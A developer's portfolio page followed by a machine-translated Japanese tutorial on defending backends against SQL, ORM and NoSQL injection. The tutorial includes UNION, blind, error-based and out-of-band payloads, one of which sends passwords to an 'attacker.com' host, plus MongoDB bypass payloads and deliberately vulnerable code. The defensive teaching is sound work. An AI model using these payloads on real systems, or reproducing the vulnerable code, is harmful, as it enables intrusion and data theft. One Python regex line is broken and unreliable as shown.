こんにちは！

Federico Calò

Sviluppatore Software | Divulgatore Tecnico

Creo applicazioni web moderne e strumenti digitali personalizzati per aiutare le attività a crescere attraverso l'innovazione tecnologica. La mia passione è unire informatica ed economia per generare valore reale.

お問い合わせ

自己紹介

La mia passione per l'informatica è nata tra i banchi dell'Istituto Tecnico Commerciale di Maglie, dove ho scoperto il potere della programmazione e il fascino di creare soluzioni digitali. Fin da subito, ho capito che l'informatica non era solo codice, ma uno strumento straordinario per trasformare idee in realtà.

Durante gli studi superiori in Sistemi Informativi Aziendali, ho iniziato a intrecciare informatica ed economia, comprendendo come la tecnologia possa essere il motore della crescita per qualsiasi attività. Questa visione mi ha accompagnato all'Università degli Studi di Bari, dove ho conseguito la Laurea in Informatica, approfondendo le mie competenze tecniche e la mia passione per lo sviluppo software.

Oggi metto questa esperienza al servizio di imprese, professionisti e startup, creando soluzioni digitali su misura che automatizzano processi, ottimizzano risorse e aprono nuove opportunità di business. Perché la vera innovazione inizia quando la tecnologia incontra le esigenze reali delle persone.

スキル

Analisi Dati & Modelli Previsionali

Trasformo i dati in insights strategici con analisi approfondite e modelli predittivi per decisioni informate

プロセス自動化

Creo strumenti personalizzati che automatizzano operazioni ripetitive e liberano tempo per attività a valore aggiunto

カスタムシステム

Sviluppo sistemi software su misura, dalle integrazioni tra piattaforme alle dashboard personalizzate

const federico = {
  nome: "Federico Calò",
  ruolo: "Sviluppatore Software",
  città: "Bari, Italia",
  missione: "Aiutare attraverso l'informatica",
  passioni: [
    "Codice Pulito",
    "Innovazione",
    "Crescita Continua"
  ]
};

ミッション

Credo fermamente che l'informatica sia lo strumento più potente per trasformare le idee in realtà e migliorare la vita delle persone.

🚀

テクノロジーの民主化

La mia missione è rendere l'informatica accessibile a tutti: dalle piccole imprese locali alle startup innovative, fino ai professionisti che vogliono digitalizzare la propria attività. Ogni realtà merita di sfruttare le potenzialità del digitale.

💡

ITとビジネスの融合

Non è solo questione di scrivere codice: è capire come la tecnologia possa generare valore reale. Intrecciando competenze informatiche e visione economica, aiuto le attività a crescere, ottimizzare processi e raggiungere nuovi traguardi di efficienza e redditività.

🎯

カスタムソリューション

Ogni attività è unica, e così devono esserlo le soluzioni. Sviluppo strumenti personalizzati che rispondono alle esigenze specifiche di ciascun cliente, automatizzando processi ripetitivi e liberando tempo per ciò che conta davvero: far crescere il business.

テクノロジーでビジネスを変革

Dicembre 2024

Visualizza

Master SQL

RoadMap.sh

Novembre 2024

Visualizza

Oracle Certified Foundations Associate

Oracle

Ottobre 2024

Visualizza

People Leadership Credential

Connect

Settembre 2024

💻 Linguaggi & Tecnologie

☕Java

🐍Python

📜JavaScript

🅰️Angular

⚛️React

🔷TypeScript

🗄️SQL

🐘PHP

🎨CSS/SCSS

🔧Node.js

🐳Docker

🌿Git

💼

12/2024 - Presente

Custom Software Engineering Analyst

Accenture

Bari, Puglia, Italia · Ibrida Analisi e sviluppo di sistemi informatici attraverso l'utilizzo di Java e Quarkus in Health and Public Sector. Formazione continua su tecnologie moderne per la creazione di soluzioni software personalizzate ed efficienti e sugli agenti.

💼

06/2022 - 12/2024

Analista software e Back End Developer Associate Consultant

Links Management and Technology SpA

Esperienza nell'analisi di sistemi software as-is e flussi ETL utilizzando PowerCenter. Formazione completata su Spring Boot per lo sviluppo di applicazioni backend moderne e scalabili. Sviluppatore Backend specializzato in Spring Boot, con esperienza in progettazione di database, analisi, sviluppo e testing dei task assegnati.

💼

02/2021 - 10/2021

Programmatore software

Adesso.it (prima era WebScience srl)

Esperienza nell'analisi AS-IS e TO-BE, evoluzioni SEO ed evoluzioni website per migliorare le performance e l'engagement degli utenti.

🎓

2018 - 2025

Laurea in Informatica

Università degli Studi di Bari Aldo Moro

Bachelor's degree in Computer Science, focusing on software engineering, algorithms, and modern development practices.

📚

2013 - 2018

Diploma - Sistemi Informativi Aziendali

Istituto Tecnico Commerciale di Maglie

Technical diploma specializing in Business Information Systems, combining IT knowledge with business management.

お問い合わせ

プロジェクトをお考えですか？お気軽にお問い合わせください。

* Campi obbligatori. I tuoi dati saranno utilizzati solo per rispondere alla tua richiesta.

03 - SQL インジェクションと入力検証: バックエンドのセキュリティ

SQL インジェクションは、Web 上で最も古く、最も危険な脆弱性の 1 つです。 1990 年代後半に初めて文書化され、現在でも壊滅的なデータ侵害の中心となっています。Verizon DBIR によると、2024 年に SQL インジェクションやその他の Web アプリケーション攻撃が原因で、 全データ侵害の 26%。 2025 年にはさらに多くのことが予想されます 2,600 CVE SQL インジェクション関連の件数は 2024 年の 2,400 件から増加。

これは従来の SQL クエリだけではありません。今日、脅威は以下にまで広がっています。 ORMインジェクション TypeORM と Prisma については、 NoSQLインジェクション MongoDB に対する攻撃、およびデータベース内にすでに存在するデータを悪用する第 2 世代の攻撃です。この記事では、Node.js、Python、Java の脆弱で安全なコードを含む各亜種を分析し、バックエンドの包括的な防御戦略を提供します。

何を学ぶか

SQL インジェクションの完全な構造: UNION、ブラインド、時間ベース、エラーベース、アウトオブバンド
二次 SQL インジェクション: その仕組みと表面的なチェックを回避する理由
TypeORM と Prisma への ORM インジェクションとその実践例
$ne や $regex などの演算子を使用した MongoDB への NoSQL インジェクション
Node.js、Python、Java のプリペアドステートメントとパラメータ化されたクエリ
Zod (Node.js)、Pydantic (Python)、および Bean Validation (Java) による入力検証
データベースの強化と最小権限の原則
SQLMap を使用してアプリケーションをテストする方法
実際のケーススタディ: MOVEit Transfer、TSA FlyCASS、ResumeLooters

SQL インジェクションの構造

SQL インジェクションは次の場合に発生します。 無効なユーザー入力は SQL クエリに直接連結されますこれにより、攻撃者がクエリ自体のロジックを変更できるようになります。根本的なアーキテクチャ上の問題: データを実行可能コードとして扱うことです。

最も単純なケース、つまり文字列連結でクエリを構築する Node.js のログインページを考えてみましょう。

// CODICE VULNERABILE - Node.js con mysql2
const express = require('express');
const mysql = require('mysql2/promise');

app.post('/login', async (req, res) => {
  const { username, password } = req.body;

  // VULNERABILE: concatenazione diretta di input utente
  const query = `SELECT * FROM users
    WHERE username = '${username}'
    AND password = '${password}'`;

  const [rows] = await db.execute(query);

  if (rows.length > 0) {
    res.json({ success: true, user: rows[0] });
  } else {
    res.status(401).json({ error: 'Credenziali non valide' });
  }
});

// ATTACCO: username = "admin' --"
// Query risultante:
// SELECT * FROM users
//   WHERE username = 'admin' --' AND password = '...'
// Il -- commenta il resto: accesso garantito senza password!

5 種類の SQL インジェクション

1. クラシック / UNION ベース

攻撃者はオペレーターを使用します UNION 最初のクエリの結果に 2 番目のクエリを追加します。アプリケーションの応答にクエリデータを含める必要があります。

-- Payload UNION-based: estrae utenti dalla tabella users
-- Input: id = 1 UNION SELECT username, password, NULL FROM users --

-- Query originale:
SELECT product_name, price, description FROM products WHERE id = 1

-- Query iniettata:
SELECT product_name, price, description FROM products WHERE id = 1
UNION SELECT username, password, NULL FROM users --

-- Prerequisito: stesso numero di colonne, tipi compatibili

2. ブラインドブールベース

アプリケーションはデータベースデータを表示しませんが、注入された条件の真偽に基づいて動作を変更します (コンテンツの表示または非表示など)。攻撃者は情報を少しずつ推測します。

-- Payload boolean-based: verifica se la prima lettera dell'utente e 'a'
-- Se la pagina risponde normalmente: condizione vera
-- Se la pagina e vuota: condizione falsa

-- Vero (pagina normale):
GET /product?id=1 AND SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a'

-- Falso (pagina vuota):
GET /product?id=1 AND SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='b'

-- Automatizzabile con sqlmap o script custom per estrarre dati carattere per carattere

3.ブラインドタイムベース

アプリケーションが目に見える形で応答を変更しない場合、攻撃者はデータベースに遅延を引き起こす関数を使用して、応答時間から情報を推測します。

-- MySQL: SLEEP() per estrarre informazioni dal timing
-- Se la risposta impiega 5 secondi: condizione vera
-- Se risponde subito: condizione falsa

-- Verifica se il database si chiama 'production':
GET /product?id=1 AND IF(
  (SELECT database())='production',
  SLEEP(5),
  0
) --

-- PostgreSQL equivalente con pg_sleep():
-- id=1; SELECT CASE WHEN (username='admin') THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users --

-- Microsoft SQL Server:
-- id=1; IF (SELECT COUNT(*) FROM users WHERE username='admin')>0 WAITFOR DELAY '0:0:5'--

4. エラーベース

攻撃者は、抽出されたデータを含むエラーメッセージをデータベースに生成させます。これは、アプリケーションがユーザーにデータベースエラーを表示する場合に機能します (運用環境向けに適切に構成されていない開発環境で頻繁に構成ミスが発生する場合)。

-- MySQL error-based: extractvalue() genera un errore con il valore estratto
-- id=1 AND extractvalue(1, concat(0x7e, (SELECT database())))

-- Errore restituito all'utente:
-- ERROR 1105 (HY000): XPATH syntax error: '~production_db'
-- L'attaccante ottiene il nome del database dall'errore!

-- PostgreSQL: cast di tipo per forzare errore
-- id=1 AND cast((SELECT version()) as int)

-- Error: invalid input syntax for type integer:
-- "PostgreSQL 15.2 on x86_64-pc-linux-gnu"

5. 帯域外 (OOB)

通常の HTTP 応答ではなく、代替チャネル (DNS ルックアップ、HTTP リクエスト) を介してデータを抽出する高度な技術。インバンドチャネルがブロックされている場合に役立ちます。

-- MySQL OOB via DNS (richiede FILE privilege e outbound DNS):
-- id=1 AND load_file(concat('\\\\', (SELECT password FROM users LIMIT 1), '.attacker.com\\x'))

-- Microsoft SQL Server OOB via HTTP (xp_dirtree o sp_makewebtask):
-- id=1; EXEC master..xp_dirtree '\\attacker.com\' + (SELECT TOP 1 password FROM users) + '\share'

-- L'attaccante vede la richiesta nei log DNS di attacker.com:
-- admin:5f4dcc3b5aa765d61d8327deb882cf99.attacker.com

二次 SQL インジェクション: 隠れた脅威

La 二次SQLインジェクション （またはストアド SQL インジェクション）は、標準のセキュリティチェックを回避するため、最も危険な脆弱性の 1 つです。ペイロードは挿入後すぐには実行されませんが、 データベースに保存された その後 取得され、後続のクエリで使用されます 適切な消毒を行わずに。

このシナリオは、挿入コードは正しく安全である可能性がありますが、読み取りおよび使用コードは脆弱であるため、特に危険です。表面浸透テストでは見逃されることがよくあります。

// SCENARIO: registrazione utente e cambio password

// FASE 1 - Registrazione (apparentemente sicura con prepared statement)
app.post('/register', async (req, res) => {
  const { username, password } = req.body;

  // Usa prepared statement - sembra sicuro!
  await db.execute(
    'INSERT INTO users (username, password) VALUES (?, ?)',
    [username, hash(password)]
  );
  // L'attaccante si registra con username: admin'--
  // Salvato correttamente nel DB come stringa: admin'--
});

// FASE 2 - Cambio password (VULNERABILE: costruisce query con dato dal DB)
app.post('/change-password', async (req, res) => {
  const userId = req.session.userId;

  // Recupera username dal DB (sembra "sicuro" perchè viene dal nostro DB)
  const [userRows] = await db.execute(
    'SELECT username FROM users WHERE id = ?',
    [userId]
  );
  const username = userRows[0].username; // = "admin'--"

  const { newPassword } = req.body;

  // VULNERABILE: concatena username recuperato dal DB
  const query = `UPDATE users SET password = '${hash(newPassword)}'
    WHERE username = '${username}'`;
  // Query risultante:
  // UPDATE users SET password = 'newhash' WHERE username = 'admin'--'
  // Aggiorna la password dell'admin, non dell'attaccante!

  await db.execute(query);
});

// SOLUZIONE: usa parameterized query ANCHE quando i dati vengono dal DB
app.post('/change-password-safe', async (req, res) => {
  const userId = req.session.userId;
  const [userRows] = await db.execute(
    'SELECT username FROM users WHERE id = ?',
    [userId]
  );
  const username = userRows[0].username;
  const { newPassword } = req.body;

  // SICURO: prepared statement anche per dati interni
  await db.execute(
    'UPDATE users SET password = ? WHERE username = ?',
    [hash(newPassword), username]
  );
});

二次注入の黄金律

データベースからのデータは常に信頼できないものとして扱います特に最初にユーザーが投稿した場合はそうです。データベースから取得したものだからといって、クエリでの使用が自動的に安全になるわけではありません。データソースに関係なく、常にパラメーター化されたクエリを使用してください。

パラメータ化されたクエリ: 主な防御策

I 準備されたステートメント (またはパラメータ化されたクエリ) は、SQL インジェクションに対する最も効果的な対策です。原理は単純です。クエリ構造がデータベースに送信されます。別途 2 つの異なるフェーズでデータから分析します。データベースはデータを受信する前に実行計画をコンパイルするため、クエリロジックを変更することはできません。

mysql2 を使用した Node.js

// SICURO: parameterized queries con mysql2
const mysql = require('mysql2/promise');

const pool = mysql.createPool({
  host: process.env.DB_HOST,
  user: process.env.DB_USER,
  password: process.env.DB_PASSWORD,
  database: process.env.DB_NAME,
  // Opzione di sicurezza: disabilita multiple statements
  multipleStatements: false,
});

// Login sicuro
async function loginUser(username, password) {
  // Il ? e un placeholder: mysql2 gestisce l'escaping automaticamente
  const [rows] = await pool.execute(
    'SELECT id, username, role FROM users WHERE username = ? AND password = ?',
    [username, hashPassword(password)]
  );
  return rows[0] || null;
}

// Ricerca con LIKE sicura
async function searchProducts(searchTerm, category, limit = 20) {
  // Anche i wildcard % devono essere nel parametro, non nella query
  const likeTerm = `%${searchTerm}%`;
  const [rows] = await pool.execute(
    `SELECT id, name, price FROM products
     WHERE name LIKE ? AND category = ?
     LIMIT ?`,
    [likeTerm, category, limit]
  );
  return rows;
}

// Inserimento sicuro con validazione
async function createUser(userData) {
  const { username, email, password, role = 'user' } = userData;

  // Whitelist per il campo role (non parametrizzabile come identifier)
  const allowedRoles = ['user', 'moderator'];
  if (!allowedRoles.includes(role)) {
    throw new Error('Ruolo non valido');
  }

  const [result] = await pool.execute(
    'INSERT INTO users (username, email, password_hash, role) VALUES (?, ?, ?, ?)',
    [username, email, hashPassword(password), role]
  );
  return result.insertId;
}

Python と psycopg2 (PostgreSQL)

# SICURO: parameterized queries con psycopg2
import psycopg2
import psycopg2.extras
from contextlib import contextmanager

@contextmanager
def get_db_connection():
    conn = psycopg2.connect(
        host=os.environ['DB_HOST'],
        database=os.environ['DB_NAME'],
        user=os.environ['DB_USER'],
        password=os.environ['DB_PASSWORD']
    )
    try:
        yield conn
    finally:
        conn.close()

def get_user_by_id(user_id: int) -> dict | None:
    """
    Usa %s come placeholder (NON f-string o format()).
    psycopg2 gestisce l'escaping dei parametri in modo sicuro.
    """
    with get_db_connection() as conn:
        with conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor) as cur:
            # Corretto: placeholder %s con tupla di parametri
            cur.execute(
                "SELECT id, username, email, role FROM users WHERE id = %s",
                (user_id,)  # Nota la virgola: deve essere una tupla
            )
            return cur.fetchone()

def search_users(filters: dict) -> list[dict]:
    """
    Costruzione dinamica sicura di query con parametri multipli.
    Evita di costruire SQL dinamico con concatenazione.
    """
    conditions = []
    params = []

    if 'username' in filters:
        conditions.append("username ILIKE %s")
        params.append(f"%{filters['username']}%")

    if 'role' in filters:
        # Whitelist per valori enumerati
        allowed_roles = {'user', 'admin', 'moderator'}
        if filters['role'] not in allowed_roles:
            raise ValueError(f"Ruolo non valido: {filters['role']}")
        conditions.append("role = %s")
        params.append(filters['role'])

    where_clause = " AND ".join(conditions) if conditions else "TRUE"
    query = f"SELECT id, username, email, role FROM users WHERE {where_clause}"

    with get_db_connection() as conn:
        with conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor) as cur:
            cur.execute(query, params)
            return cur.fetchall()

# SBAGLIATO - Non fare mai questo:
# cur.execute(f"SELECT * FROM users WHERE id = {user_id}")  # f-string = vulnerabile
# cur.execute("SELECT * FROM users WHERE id = " + str(user_id))  # concatenazione = vulnerabile
# cur.execute("SELECT * FROM users WHERE id = %s" % user_id)  # % formatting = vulnerabile

Java と JDBC PreparedStatement

// SICURO: PreparedStatement con JDBC in Java
import java.sql.*;
import java.util.Optional;

public class UserRepository {

    private final DataSource dataSource;

    public UserRepository(DataSource dataSource) {
        this.dataSource = dataSource;
    }

    // SICURO: PreparedStatement parametrizzato
    public Optional<User> findByUsername(String username) {
        String sql = "SELECT id, username, email, role FROM users WHERE username = ?";

        try (Connection conn = dataSource.getConnection();
             PreparedStatement stmt = conn.prepareStatement(sql)) {

            stmt.setString(1, username);  // Parametro 1-indexed
            ResultSet rs = stmt.executeQuery();

            if (rs.next()) {
                return Optional.of(new User(
                    rs.getLong("id"),
                    rs.getString("username"),
                    rs.getString("email"),
                    rs.getString("role")
                ));
            }
            return Optional.empty();
        } catch (SQLException e) {
            throw new DatabaseException("Errore nella ricerca utente", e);
        }
    }

    // Inserimento sicuro con transazione
    public long createUser(String username, String email, String passwordHash) {
        String sql = "INSERT INTO users (username, email, password_hash, created_at) " +
                     "VALUES (?, ?, ?, NOW())";

        try (Connection conn = dataSource.getConnection()) {
            conn.setAutoCommit(false);

            try (PreparedStatement stmt = conn.prepareStatement(
                    sql, Statement.RETURN_GENERATED_KEYS)) {

                stmt.setString(1, username);
                stmt.setString(2, email);
                stmt.setString(3, passwordHash);
                stmt.executeUpdate();

                conn.commit();

                ResultSet keys = stmt.getGeneratedKeys();
                if (keys.next()) {
                    return keys.getLong(1);
                }
                throw new DatabaseException("Impossibile ottenere ID generato");
            } catch (SQLException e) {
                conn.rollback();
                throw new DatabaseException("Errore creazione utente", e);
            }
        } catch (SQLException e) {
            throw new DatabaseException("Errore connessione database", e);
        }
    }

    // SBAGLIATO - Statement.execute() con concatenazione:
    // String sql = "SELECT * FROM users WHERE username = '" + username + "'";
    // stmt.execute(sql);  // MAI fare questo!
}

ORM インジェクション: 「安全」だけでは不十分な場合

多くの開発者は、ORM (オブジェクトリレーショナルマッパー) を使用すると SQL インジェクションのリスクが自動的に排除されると誤解しています。実際、2025 年の調査によると、 ORM を使用するアプリケーションの 30% 以上に SQL インジェクションの脆弱性が依然として存在します。 間違った使用パターンが原因です。最も一般的なケースを見てみましょう。

TypeORM: 生のクエリと QueryBuilder

// TypeORM - Pattern VULNERABILI vs SICURI

import { DataSource, Repository } from 'typeorm';
import { User } from './entities/User';

// VULNERABILE 1: query() con interpolazione di stringa
async function findUserVulnerable(username: string) {
  const result = await dataSource.query(
    `SELECT * FROM users WHERE username = '${username}'`
    // Se username = "admin' OR '1'='1", bypass immediato!
  );
  return result;
}

// SICURO 1: query() con parametri posizionali
async function findUserSafe(username: string) {
  const result = await dataSource.query(
    'SELECT id, username, email FROM users WHERE username = $1',
    [username]  // Parametri come array separato
  );
  return result;
}

// VULNERABILE 2: QueryBuilder con where() e interpolazione
async function searchUserVulnerable(role: string, search: string) {
  return await dataSource
    .createQueryBuilder(User, 'user')
    .where(`user.role = '${role}' AND user.username LIKE '%${search}%'`)
    // Interpolazione diretta = SQL injection!
    .getMany();
}

// SICURO 2: QueryBuilder con parametri nominati
async function searchUserSafe(role: string, search: string) {
  // Whitelist per campi enumerati come role
  const allowedRoles = ['user', 'admin', 'moderator'] as const;
  if (!allowedRoles.includes(role as any)) {
    throw new Error('Ruolo non valido');
  }

  return await dataSource
    .createQueryBuilder(User, 'user')
    .where('user.role = :role AND user.username LIKE :search', {
      role,                    // Parametro nominato :role
      search: `%${search}%`  // Il % viene nel parametro, non nella query
    })
    .select(['user.id', 'user.username', 'user.email'])
    .getMany();
}

// SICURO 3: Repository API (il modo più sicuro con TypeORM)
async function findUsersByRoleSafe(
  userRepository: Repository<User>,
  role: string
) {
  return await userRepository.findBy({ role });
  // TypeORM genera automaticamente query parametrizzate
}

// SICURO 4: find() con condizioni complesse
async function findActiveUsersSafe(
  userRepository: Repository<User>
) {
  return await userRepository.find({
    where: {
      isActive: true,
      role: 'user'
    },
    select: {
      id: true,
      username: true,
      email: true
    },
    take: 100  // Limita i risultati
  });
}

Prism: $queryRaw のケース

一般に、Prisma は標準クエリに対して安全であると考えられていますが、メソッド $queryRaw e $executeRaw 特別な注意が必要です。 2025 年の研究では、Prisma が攻撃に対して脆弱である可能性があることが示されています 時間ベースの JSON 演算子とデータベース関数を介して。

// Prisma - Pattern VULNERABILI vs SICURI

import { PrismaClient } from '@prisma/client';

const prisma = new PrismaClient();

// VULNERABILE: $queryRaw con template literal non sicuro
async function getUserVulnerable(userId: string) {
  // MAI usare $queryRawUnsafe con input utente!
  const result = await prisma.$queryRawUnsafe(
    `SELECT * FROM users WHERE id = ${userId}`
    // userId = "1 OR 1=1" bypassa il filtro!
  );
  return result;
}

// SICURO 1: $queryRaw con tagged template literals
// Prisma parametrizza automaticamente le interpolazioni nel tagged template
async function getUserSafe(userId: number) {
  // Nota: usa Prisma.sql template tag, NON stringa normale
  const result = await prisma.$queryRaw`
    SELECT id, username, email FROM users WHERE id = ${userId}
  `;
  // Prisma converte ${userId} in un parametro preparato automaticamente
  return result;
}

// SICURO 2: Usa l'API standard di Prisma quando possibile
async function getUserWithOrders(userId: number) {
  return await prisma.user.findUnique({
    where: { id: userId },
    select: {
      id: true,
      username: true,
      email: true,
      orders: {
        where: { status: 'active' },
        take: 10
      }
    }
  });
  // Completamente sicuro: Prisma genera prepared statements
}

// ATTENZIONE: Prisma findMany con where esposto all'utente
// VULNERABILE: ORM Leak - espone troppi dati
async function searchUsersVulnerable(userFilter: any) {
  return await prisma.user.findMany({
    where: userFilter,  // L'utente controlla il where = ORM Leak!
    // Un attaccante può usare: { password: { startsWith: 'a' } }
    // Per estrarre la password carattere per carattere (timing attack)
  });
}

// SICURO: schema di validazione strict per i filtri
import { z } from 'zod';

const UserSearchSchema = z.object({
  username: z.string().max(50).optional(),
  email: z.string().email().optional(),
  role: z.enum(['user', 'moderator']).optional(),
});

async function searchUsersSafe(rawFilter: unknown) {
  // Valida e trasforma il filtro con schema strict
  const validFilter = UserSearchSchema.parse(rawFilter);

  return await prisma.user.findMany({
    where: validFilter,  // Solo campi consentiti e validati
    select: {          // Seleziona esplicitamente i campi
      id: true,
      username: true,
      email: true,
      role: true,
    },
    take: 50,
  });
}

NoSQL インジェクション: MongoDB と危険なオペレーター

MongoDB などの NoSQL データベースを使用するアプリケーションは、インジェクションの影響を受けません。 NoSQL 攻撃は クエリ演算子 データベースの (例: $ne, $gt, $regex) クエリロジックを変更します。典型的な攻撃ベクトルは、HTTP リクエスト内の不正な形式の JSON 本文です。

// MongoDB con Mongoose - VULNERABILE
const express = require('express');
const User = require('./models/User');

// VULNERABILE: usa direttamente req.body come query MongoDB
app.post('/login', async (req, res) => {
  const { username, password } = req.body;

  // Se il body e: { "username": { "$ne": null }, "password": { "$ne": null } }
  // La query diventa: WHERE username != null AND password != null
  // Ritorna il PRIMO utente nel DB, bypass completo!
  const user = await User.findOne({ username, password });

  if (user) {
    res.json({ token: generateToken(user) });
  } else {
    res.status(401).json({ error: 'Non autorizzato' });
  }
});

// Payload di attacco (come JSON body):
// {
//   "username": { "$ne": null },
//   "password": { "$ne": null }
// }

// Altri payload comuni:
// { "username": { "$regex": ".*" } }    -- match qualsiasi username
// { "password": { "$gt": "" } }          -- password > stringa vuota (sempre vero)
// { "username": { "$in": ["admin", "root", "administrator"] } }

// MongoDB con Mongoose - SICURO

const express = require('express');
const mongoose = require('mongoose');
const mongoSanitize = require('express-mongo-sanitize');
const { z } = require('zod');
const bcrypt = require('bcrypt');

// 1. Middleware globale di sanitizzazione
app.use(mongoSanitize({
  replaceWith: '_',  // Sostituisce $ con _ negli operatori
  onSanitizeError(req, res) {
    res.status(400).json({ error: 'Input non valido' });
  }
}));

// 2. Schema Zod per validazione strict del tipo
const LoginSchema = z.object({
  username: z.string().min(3).max(50).regex(/^[a-zA-Z0-9_]+$/),
  password: z.string().min(8).max(128),
});

// SICURO: validazione + hashing password + nessuna query con password in chiaro
app.post('/login', async (req, res) => {
  try {
    // Valida il tipo: username e password DEVONO essere stringhe
    const { username, password } = LoginSchema.parse(req.body);

    // Cerca per username (stringa validata, non oggetto)
    const user = await User.findOne({ username }).select('+password');

    if (!user) {
      // Tempo di risposta costante per prevenire timing attacks
      await bcrypt.compare(password, '$2b$10$placeholder.hash.here.for.timing');
      return res.status(401).json({ error: 'Credenziali non valide' });
    }

    // Verifica password con bcrypt (non in chiaro nel DB)
    const isValid = await bcrypt.compare(password, user.password);
    if (!isValid) {
      return res.status(401).json({ error: 'Credenziali non valide' });
    }

    res.json({ token: generateToken(user) });
  } catch (error) {
    if (error instanceof z.ZodError) {
      return res.status(400).json({ error: 'Formato input non valido' });
    }
    // Non esporre dettagli dell'errore interno
    res.status(500).json({ error: 'Errore del server' });
  }
});

// 3. Mongoose schema con strict mode (default: true)
const userSchema = new mongoose.Schema({
  username: { type: String, required: true, unique: true },
  email: { type: String, required: true },
  password: { type: String, required: true, select: false },
  role: { type: String, enum: ['user', 'admin', 'moderator'], default: 'user' }
}, {
  strict: true,  // Ignora campi non definiti nello schema
  // sanitizeFilter: true  // Mongoose 6+: sanitizza automaticamente i query operator
});

// 4. Usa sanitizeFilter per query che accettano filtri utente
const UserModel = mongoose.model('User', userSchema);

async function findUsersByFilter(rawFilter) {
  // sanitizeFilter: true nel modello previene ORM injection
  // oppure usa questo approccio esplicito:
  return await UserModel.find(rawFilter).sanitizeFilter(true);
}

入力検証: 防御の第一線

パラメータ化されたクエリは SQL インジェクションから保護しますが、入力検証 は最初の防御障壁であり、攻撃対象領域を大幅に減らします。堅牢な検証は次の原則に従います。 ホワイトリスト ブロックリスト (何が禁止されているかを指定) ではなく (何が許可されているかを指定)。

Node.js/TypeScript の Zod

// Input validation con Zod - Node.js/TypeScript
import { z } from 'zod';

// Schema riutilizzabile per parametri comuni
const IdSchema = z.coerce.number().int().positive().max(2147483647);

const PaginationSchema = z.object({
  page: z.coerce.number().int().min(1).default(1),
  limit: z.coerce.number().int().min(1).max(100).default(20),
  sortBy: z.enum(['created_at', 'username', 'email']).default('created_at'),
  sortOrder: z.enum(['asc', 'desc']).default('desc'),
});

// Schema per creazione utente
const CreateUserSchema = z.object({
  username: z
    .string()
    .min(3, 'Username troppo corto')
    .max(50, 'Username troppo lungo')
    .regex(/^[a-zA-Z0-9_-]+$/, 'Caratteri non consentiti nell\'username'),
  email: z
    .string()
    .email('Formato email non valido')
    .max(255),
  password: z
    .string()
    .min(8, 'Password troppo corta')
    .max(128, 'Password troppo lunga')
    .regex(
      /^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*?&])/,
      'La password deve contenere maiuscole, minuscole, numeri e caratteri speciali'
    ),
  role: z.enum(['user', 'moderator']).default('user'),
});

// Middleware di validazione generico per Express
function validateBody<T>(schema: z.ZodSchema<T>) {
  return (req: Request, res: Response, next: NextFunction) => {
    const result = schema.safeParse(req.body);
    if (!result.success) {
      return res.status(400).json({
        error: 'Dati non validi',
        details: result.error.issues.map(issue => ({
          field: issue.path.join('.'),
          message: issue.message,
        })),
      });
    }
    req.body = result.data;  // Sostituisce con dati validati e tipizzati
    next();
  };
}

function validateQuery<T>(schema: z.ZodSchema<T>) {
  return (req: Request, res: Response, next: NextFunction) => {
    const result = schema.safeParse(req.query);
    if (!result.success) {
      return res.status(400).json({
        error: 'Parametri query non validi',
        details: result.error.issues,
      });
    }
    req.validatedQuery = result.data;
    next();
  };
}

// Uso nei router
app.post('/api/users',
  validateBody(CreateUserSchema),
  async (req, res) => {
    // req.body e ora tipizzato e validato
    const user = await createUser(req.body);
    res.status(201).json({ id: user.id });
  }
);

app.get('/api/products',
  validateQuery(PaginationSchema),
  async (req, res) => {
    const { page, limit, sortBy, sortOrder } = req.validatedQuery;
    const products = await getProducts(page, limit, sortBy, sortOrder);
    res.json(products);
  }
);

Python/FastAPI 用の Pydantic

# Input validation con Pydantic v2 - Python/FastAPI
from pydantic import BaseModel, Field, field_validator, EmailStr
from typing import Literal
from enum import Enum
import re

class UserRole(str, Enum):
    user = "user"
    moderator = "moderator"
    admin = "admin"

class CreateUserRequest(BaseModel):
    username: str = Field(
        min_length=3,
        max_length=50,
        description="Username alfanumerico"
    )
    email: EmailStr
    password: str = Field(min_length=8, max_length=128)
    role: UserRole = UserRole.user

    @field_validator('username')
    @classmethod
    def username_alphanumeric(cls, v: str) -> str:
        if not re.match(r'^[a-zA-Z0-9_-]+, v):
            raise ValueError('Username deve contenere solo lettere, numeri, _ e -')
        return v.lower()

    @field_validator('password')
    @classmethod
    def password_strength(cls, v: str) -> str:
        if not re.search(r'[A-Z]', v):
            raise ValueError('La password deve contenere almeno una maiuscola')
        if not re.search(r'[a-z]', v):
            raise ValueError('La password deve contenere almeno una minuscola')
        if not re.search(r'\d', v):
            raise ValueError('La password deve contenere almeno un numero')
        if not re.search(r'[@$!%*?&]', v):
            raise ValueError('La password deve contenere almeno un carattere speciale')
        return v

    model_config = {
        "str_strip_whitespace": True,  # Rimuove spazi iniziali/finali
        "str_max_length": 500,         # Limite globale lunghezza stringhe
    }

class PaginationParams(BaseModel):
    page: int = Field(default=1, ge=1, le=10000)
    limit: int = Field(default=20, ge=1, le=100)
    sort_by: Literal['created_at', 'username', 'email'] = 'created_at'
    sort_order: Literal['asc', 'desc'] = 'desc'

# FastAPI endpoint con validazione automatica
from fastapi import FastAPI, HTTPException
app = FastAPI()

@app.post("/api/users", status_code=201)
async def create_user(user_data: CreateUserRequest):
    # Pydantic ha già validato tutti i campi
    # user_data e un oggetto tipizzato, non un dict generico
    user = await user_service.create(
        username=user_data.username,
        email=user_data.email,
        password=user_data.password,
        role=user_data.role.value
    )
    return {"id": user.id}

@app.get("/api/products")
async def list_products(pagination: PaginationParams):
    return await product_service.list(
        page=pagination.page,
        limit=pagination.limit,
        sort_by=pagination.sort_by,
        sort_order=pagination.sort_order
    )

データベースの強化と最小権限の原則

完璧にパラメータ化されたクエリを使用したとしても、データベースの構成が不十分であると、攻撃が成功した場合の被害が大幅に増幅されます。の 最小特権の原則 各コンポーネントがその機能に厳密に必要な権限のみを持つことを保証します。

-- Database Hardening: PostgreSQL come esempio

-- 1. Crea utenti dedicati per ogni ruolo applicativo
-- MAI usare l'utente postgres/root per l'applicazione!

-- Utente per l'applicazione web (solo DML)
CREATE USER app_web WITH PASSWORD 'strong_random_password_here';
GRANT CONNECT ON DATABASE myapp TO app_web;
GRANT USAGE ON SCHEMA public TO app_web;
GRANT SELECT, INSERT, UPDATE, DELETE ON ALL TABLES IN SCHEMA public TO app_web;
